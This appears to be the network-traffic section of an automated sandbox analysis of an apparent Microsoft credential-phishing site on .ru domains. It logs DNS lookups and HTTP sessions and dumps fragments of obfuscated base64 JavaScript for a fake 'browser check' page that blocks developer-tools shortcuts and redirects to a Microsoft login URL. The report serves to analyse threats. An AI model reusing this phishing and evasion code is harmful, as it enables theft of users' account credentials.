                                                                Jan 13, 2025 20:55:08.551158905 CET1.1.1.1192.168.2.50xf70bNo error (0)s8zvm920jqjiu0mkvwrkbz6zbaapggwaat1ppvh6sofcvojnfpayo.mentespic.ru65IN (0x0001)false
                                                                Jan 13, 2025 20:55:08.607930899 CET1.1.1.1192.168.2.50x807dNo error (0)s8zvm920jqjiu0mkvwrkbz6zbaapggwaat1ppvh6sofcvojnfpayo.mentespic.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:55:08.607930899 CET1.1.1.1192.168.2.50x807dNo error (0)s8zvm920jqjiu0mkvwrkbz6zbaapggwaat1ppvh6sofcvojnfpayo.mentespic.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:55:09.456897020 CET1.1.1.1192.168.2.50x7ed7No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                Jan 13, 2025 20:55:09.456897020 CET1.1.1.1192.168.2.50x7ed7No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 13, 2025 20:55:09.457031012 CET1.1.1.1192.168.2.50x121fNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                Jan 13, 2025 20:55:09.457031012 CET1.1.1.1192.168.2.50x121fNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 13, 2025 20:55:11.249610901 CET1.1.1.1192.168.2.50x368aNo error (0)shed.dual-low.s-part-0036.t-0009.t-msedge.nets-part-0036.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 13, 2025 20:55:11.249610901 CET1.1.1.1192.168.2.50x368aNo error (0)s-part-0036.t-0009.t-msedge.net13.107.246.64A (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:55:12.166428089 CET1.1.1.1192.168.2.50x4cfaNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 13, 2025 20:55:12.166428089 CET1.1.1.1192.168.2.50x4cfaNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:55:13.279453039 CET1.1.1.1192.168.2.50xcc29No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 13, 2025 20:55:13.279603004 CET1.1.1.1192.168.2.50x2ed3No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 13, 2025 20:56:14.191572905 CET1.1.1.1192.168.2.50x34b8No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 13, 2025 20:56:14.191663980 CET1.1.1.1192.168.2.50x551bNo error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                • rfll.yordickyel.ru
                                                                • https:
                                                                  • challenges.cloudflare.com
                                                                  • cdnjs.cloudflare.com
                                                                  • code.jquery.com
                                                                  • s8zvm920jqjiu0mkvwrkbz6zbaapggwaat1ppvh6sofcvojnfpayo.mentespic.ru
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.549712172.67.198.1664433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-13 19:54:47 UTC649OUTGET /16E/ HTTP/1.1
                                                                Host: rfll.yordickyel.ru
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                sec-ch-ua-platform: "Windows"
                                                                Upgrade-Insecure-Requests: 1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: navigate
                                                                Sec-Fetch-Dest: iframe
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-13 19:54:48 UTC1244INHTTP/1.1 200 OK
                                                                Date: Mon, 13 Jan 2025 19:54:48 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Cache-Control: no-cache, private
                                                                cf-cache-status: DYNAMIC
                                                                vary: accept-encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r60CEogNIXm3wRHzhrqj%2FVZtSyHNLquOeM2AoZNdFbEUt8lJCnkJPHaXc%2BeK2b9t19UtUzw28vdQJZ4DMFermR2WptCV7QXoxueGMkNvunOQC2Cb1ZG3j0%2BKyKVf5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=74580&min_rtt=74503&rtt_var=20998&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1558&delivery_rate=38191&cwnd=237&unsent_bytes=0&cid=505d2232724cd1ad&ts=279&x=0"
                                                                Set-Cookie: XSRF-TOKEN=eyJpdiI6IkFqREM5K0tlSkZpMnppdnd4cG9BMEE9PSIsInZhbHVlIjoiUkdIRXdyNzV3QmYrZWx0WTdzTmtLbUxzUFVXQVVSM01BZU5JOUdMTjJtTG80Wjd4cTd4c1o5MG1Hc3J1RFB2YlZYbmhJN2tXMERUSVJuNHFDVklOajBZZHBEKzNkY0g2aCtvcm9RYjBaV0dVT3J3VTZpNHYwaWZYSFhmekJLbFciLCJtYWMiOiJiODZkZTQ1Y2Q4NmJjODA4ZWY3MjM4NWU2YzE1ZDZjM2QwY2MwZmJjODE1NGIzNjE4NGRiM2Q0NjA0ODMwODUwIiwidGFnIjoiIn0%3D; expires=Mon, 13-Jan-2025 21:54:48 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                2025-01-13 19:54:48 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6a 52 70 64 48 52 77 59 58 64 44 4b 31 4e 50 56 47 67 33 4d 31 6c 61 56 44 4e 51 52 6b 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 52 31 46 79 4e 47 6c 55 5a 6a 5a 44 5a 30 39 54 54 47 5a 32 61 6e 5a 35 55 33 4e 6a 4f 57 77 34 5a 31 46 6e 51 33 70 73 55 55 4e 54 5a 54 5a 6c 57 55 38 79 51 32 78 45 61 6d 56 6b 61 33 41 35 4d 6b 46 35 65 46 6c 36 4f 48 46 4d 64 55 5a 59 61 6e 64 74 55 6d 35 43 51 6a 46 53 4d 6a 68 6f 64 45 70 45 55 44 6b 77 4f 58 63 78 4b 31 42 59 59 30 46 55 4c 7a 4a 6a 59 56 42 35 4e 30 78 4a 4f 58 68 54 52 56 55 31 55 6c 52 4c 64 6d 78 79 65 45 30 72 55 48 4e 68 4e 31 45 31 4d 30 5a 48 62 32 78 31 64 6d 4d 7a 61 6a 55
                                                                Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IjRpdHRwYXdDK1NPVGg3M1laVDNQRkE9PSIsInZhbHVlIjoiR1FyNGlUZjZDZ09TTGZ2anZ5U3NjOWw4Z1FnQ3psUUNTZTZlWU8yQ2xEamVka3A5MkF5eFl6OHFMdUZYandtUm5CQjFSMjhodEpEUDkwOXcxK1BYY0FULzJjYVB5N0xJOXhTRVU1UlRLdmxyeE0rUHNhN1E1M0ZHb2x1dmMzajU
                                                                2025-01-13 19:54:48 UTC1369INData Raw: 34 64 39 39 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 79 52 6b 78 4d 4c 6e 6c 76 63 6d 52 70 59 32 74 35 5a 57 77 75 63 6e 55 76 4d 54 5a 46 4c 77 3d 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 49 48 4e 79 59 7a 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 32 52 6c 4c 6d 70 78 64 57 56 79 65 53 35 6a 62 32 30 76 61 6e 46 31 5a 58
                                                                Data Ascii: 4d99<script>if(atob("aHR0cHM6Ly9yRkxMLnlvcmRpY2t5ZWwucnUvMTZFLw==") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZX
                                                                2025-01-13 19:54:48 UTC1369INData Raw: 63 48 67 37 4c 79 70 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 71 4c 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57 30 70 4f 33 42 68 5a 47 52 70 62 6d 63 74 62 47 56 6d 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 62 57 46 79 5a 32 6c 75 4c 58 4a 70 5a 32 68 30 4f 69 42 68 64 58 52 76 4f 32 31 68 63 6d 64 70 62 69 31 73 5a 57 5a 30 4f 69 42 68 64 58 52 76 4f 33 30 4e 43 69 4e 44 63 6b 74 35 63 58 4e 4f 62 47 35 56 49 43 35 30 5a 58 68 30 4c 57 4e 6c 62 6e 52 6c 63 69 42 37 64 47 56 34 64 43 31 68 62 47 6c 6e 62 6a 6f 67 59 32 56 75 64 47 56 79 49 57 6c 74 63 47 39
                                                                Data Ascii: cHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7bWFyZ2luLXJpZ2h0OiBhdXRvO21hcmdpbi1sZWZ0OiBhdXRvO30NCiNDckt5cXNObG5VIC50ZXh0LWNlbnRlciB7dGV4dC1hbGlnbjogY2VudGVyIWltcG9
                                                                2025-01-13 19:54:48 UTC1369INData Raw: 51 30 4b 44 51 6f 67 49 43 41 67 61 57 59 67 4b 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 34 4e 53 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 63 32 68 70 5a 6e 52 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4e 7a 4d 70 49 48 78 38 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6e 4e 6f 61 57 5a 30 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76
                                                                Data Ascii: Q0KDQogICAgaWYgKA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzMpIHx8DQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LnNoaWZ0S2V5ICYmIGV2ZW50LmtleUNv
                                                                2025-01-13 19:54:48 UTC1369INData Raw: 41 67 49 47 6c 6d 49 43 68 61 53 56 64 4b 62 30 35 78 62 31 5a 7a 49 43 30 67 5a 45 35 42 59 56 42 70 52 56 64 45 65 53 41 2b 49 46 56 6a 57 6d 4e 46 57 56 42 69 65 6b 51 67 4a 69 59 67 49 57 64 79 54 32 39 33 53 6d 39 43 55 33 63 70 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 47 4a 6c 57 58 42 36 59 6d 78 50 52 46 6f 67 50 53 42 30 63 6e 56 6c 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 5a 33 4a 50 62 33 64 4b 62 30 4a 54 64 79 41 39 49 48 52 79 64 57 55 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 33 61 57 35 6b 62 33 63 75 62 47 39 6a 59 58 52 70 62 32 34 75 63 6d 56 77 62 47 46 6a 5a 53 67 6e 61 48 52 30 63 48 4d 36 4c 79 39 73 62 32 64 70 62 69 35 74 61 57 4e 79 62 33 4e 76 5a 6e 52 76 62 6d 78 70 62
                                                                Data Ascii: AgIGlmIChaSVdKb05xb1ZzIC0gZE5BYVBpRVdEeSA+IFVjWmNFWVBiekQgJiYgIWdyT293Sm9CU3cpIHsNCiAgICAgICAgICAgIGJlWXB6YmxPRFogPSB0cnVlOw0KICAgICAgICAgICAgZ3JPb3dKb0JTdyA9IHRydWU7DQogICAgICAgICAgICB3aW5kb3cubG9jYXRpb24ucmVwbGFjZSgnaHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpb
                                                                2025-01-13 19:54:48 UTC1369INData Raw: 73 59 58 4e 7a 50 53 4a 30 5a 58 68 30 4c 57 4e 6c 62 6e 52 6c 63 69 49 67 61 57 51 39 49 6b 39 51 56 31 42 36 55 6d 6c 6e 52 55 45 69 50 67 30 4b 55 6e 56 75 62 6d 6c 75 5a 79 42 69 63 6d 39 33 63 32 56 79 49 47 4e 6f 5a 57 4e 72 63 79 42 30 62 79 42 6c 62 6e 4e 31 63 6d 55 67 65 57 39 31 63 69 42 7a 59 57 5a 6c 64 48 6b 75 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 77 76 5a 6d 39 79 62 54 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 78 7a 59 33 4a 70 63 48 51 2b 44 51 70 30 64 58 4a 75 63 33 52 70 62 47 55 75 63 6d 56 75 5a 47 56 79 4b 43 63 6a 59 32 59 6e 4c 43 42 37 44 51 6f 67 49 43 41 67 63 32 6c 30 5a 57 74 6c 65 54 6f 67 4a 7a 42 34 4e 45 46 42 51 55 46 42 51 55 45 30 63 47 35 48 55 55
                                                                Data Ascii: sYXNzPSJ0ZXh0LWNlbnRlciIgaWQ9Ik9QV1B6UmlnRUEiPg0KUnVubmluZyBicm93c2VyIGNoZWNrcyB0byBlbnN1cmUgeW91ciBzYWZldHkuDQo8L2Rpdj4NCjwvZm9ybT4NCjwvZGl2Pg0KPC9kaXY+DQo8L2Rpdj4NCjxzY3JpcHQ+DQp0dXJuc3RpbGUucmVuZGVyKCcjY2YnLCB7DQogICAgc2l0ZWtleTogJzB4NEFBQUFBQUE0cG5HUU
                                                                2025-01-13 19:54:48 UTC1369INData Raw: 63 33 42 76 62 6e 4e 6c 4c 6d 70 7a 62 32 34 6f 4b 54 73 4e 43 69 41 67 49 43 42 39 4b 53 35 30 61 47 56 75 4b 47 52 68 64 47 45 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 70 5a 69 68 6b 59 58 52 68 57 79 64 7a 64 47 46 30 64 58 4d 6e 58 53 41 39 50 53 41 6e 63 33 56 6a 59 32 56 7a 63 79 63 70 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 70 5a 69 68 69 5a 56 6c 77 65 6d 4a 73 54 30 52 61 49 44 30 39 49 47 5a 68 62 48 4e 6c 4b 58 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 62 47 39 6a 59 58 52 70 62 32 34 75 63 6d 56 73 62 32 46 6b 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 30 4e 43 69 41 67 49 43 41 67 49 43 41 67 66 51 30 4b 49 43 41 67 49 43 41 67 49 43 42 70 5a 69 68 6b 59 58 52 68 57 79 64 7a 64 47 46 30 64 58 4d 6e 58 53 41
                                                                Data Ascii: c3BvbnNlLmpzb24oKTsNCiAgICB9KS50aGVuKGRhdGEgPT4gew0KICAgICAgICBpZihkYXRhWydzdGF0dXMnXSA9PSAnc3VjY2Vzcycpew0KICAgICAgICBpZihiZVlwemJsT0RaID09IGZhbHNlKXsNCiAgICAgICAgbG9jYXRpb24ucmVsb2FkKCk7DQogICAgICAgIH0NCiAgICAgICAgfQ0KICAgICAgICBpZihkYXRhWydzdGF0dXMnXSA
                                                                2025-01-13 19:54:48 UTC1369INData Raw: 74 20 63 6f 75 6e 74 73 2e 20 2a 2f 0d 0a 69 66 28 65 78 55 63 6e 63 44 76 42 47 20 3d 3d 20 51 66 47 58 4f 50 64 69 48 57 29 7b 0d 0a 63 6f 6e 73 74 20 5a 77 72 5a 51 66 71 69 75 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 73 70 6c 69 74 28 27 25 32 33 27 29 5b 30 5d 2e 73 70 6c 69 74 28 27 25 33 46 27 29 5b 30 5d 3b 0d 0a 69 66 20 28 4e 72 5a 6f 4e 75 50 54 5a 6c 2e 70 61 74 68 6e 61 6d 65 2e 65 6e 64 73 57 69 74 68 28 27 2f 27 29 29 20 7b 0d 0a 4e 72 5a 6f 4e 75 50 54 5a 6c 2e 70 61 74 68 6e 61 6d 65 20 3d 20 4e 72 5a 6f 4e 75 50 54 5a 6c 2e 70 61 74 68 6e 61 6d 65 2e 73 6c 69 63 65 28 30 2c 20 2d 31 29 3b 0d 0a 7d 0d 0a 63 6f 6e 73 74 20 43 51 4e 43 6f 74 75 45 41 52 20 3d 20 4e 72 5a 6f 4e 75 50 54 5a 6c 2e
                                                                Data Ascii: t counts. */if(exUcncDvBG == QfGXOPdiHW){const ZwrZQfqiul = window.location.pathname.split('%23')[0].split('%3F')[0];if (NrZoNuPTZl.pathname.endsWith('/')) {NrZoNuPTZl.pathname = NrZoNuPTZl.pathname.slice(0, -1);}const CQNCotuEAR = NrZoNuPTZl.
                                                                2025-01-13 19:54:48 UTC1369INData Raw: 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 30 4e 79 53 33 6c 78 63 30 35 73 62 6c 55 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 51 33 4a 4c 65 58 46 7a 54 6d 78 75 56 53 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 30 4e 79 53 33 6c 78 63 30 35 73 62 6c 55 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 54 4d 35 63 48 67 37 4c 79 70 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 71 4c 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36
                                                                Data Ascii: WR0aDoxMjAwcHgpew0KI0NyS3lxc05sblUgaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojQ3JLeXFzTmxuVSBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI0NyS3lxc05sblUuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTM5cHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaHQ6
                                                                2025-01-13 19:54:48 UTC1369INData Raw: 73 69 4f 77 30 4b 66 51 30 4b 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 57 52 6b 52 58 5a 6c 62 6e 52 4d 61 58 4e 30 5a 57 35 6c 63 69 67 6e 61 32 56 35 5a 47 39 33 62 69 63 73 49 47 5a 31 62 6d 4e 30 61 57 39 75 4b 47 56 32 5a 57 35 30 4b 53 42 37 44 51 6f 67 49 43 41 67 61 57 59 67 4b 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 45 79 4d 79 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 5a 6d 46 73 63 32 55 37 44 51 6f 67 49 43 41 67 66 51 30 4b 44 51 6f 67 49 43 41 67 61 57 59 67 4b 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62
                                                                Data Ascii: siOw0KfQ0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGZ1bmN0aW9uKGV2ZW50KSB7DQogICAgaWYgKGV2ZW50LmtleUNvZGUgPT09IDEyMykgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAgaWYgKA0KICAgICAgICAoZXZlbnQuY3Ryb


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.549714104.18.94.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-13 19:54:49 UTC562OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Referer: https://rfll.yordickyel.ru/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-13 19:54:49 UTC386INHTTP/1.1 302 Found
                                                                Date: Mon, 13 Jan 2025 19:54:49 GMT
                                                                Content-Length: 0
                                                                Connection: close
                                                                access-control-allow-origin: *
                                                                cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                cross-origin-resource-policy: cross-origin
                                                                location: /turnstile/v0/b/e0c90b6a3ed1/api.js
                                                                Server: cloudflare
                                                                CF-RAY: 9017f0b8d8fd8ca5-EWR
                                                                alt-svc: h3=":443"; ma=86400


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.549715104.17.25.144433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-13 19:54:49 UTC564OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                Host: cdnjs.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Referer: https://rfll.yordickyel.ru/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-13 19:54:49 UTC962INHTTP/1.1 200 OK
                                                                Date: Mon, 13 Jan 2025 19:54:49 GMT
                                                                Content-Type: application/javascript; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Cache-Control: public, max-age=30672000
                                                                ETag: W/"61182885-40eb"
                                                                Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                cf-cdnjs-via: cfworker/kv
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Timing-Allow-Origin: *
                                                                X-Content-Type-Options: nosniff
                                                                CF-Cache-Status: HIT
                                                                Age: 455900
                                                                Expires: Sat, 03 Jan 2026 19:54:49 GMT
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iEKdkHnT4Oxqicg%2BPY3DaaUkS02%2F1ZDJB3HYHM9vNhJTkBmFoAe%2BPCoEdogBS5kOfgjxjLaPklPOQa8DiaEuQ5%2BaKMf24x8G0ih%2BcuGb6ws3sicHTXUKOJKmSj25Y1KEmjEM9IMA"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                Strict-Transport-Security: max-age=15780000
                                                                Server: cloudflare
                                                                CF-RAY: 9017f0b8eaff4313-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-13 19:54:49 UTC407INData Raw: 37 62 65 66 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                Data Ascii: 7bef!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
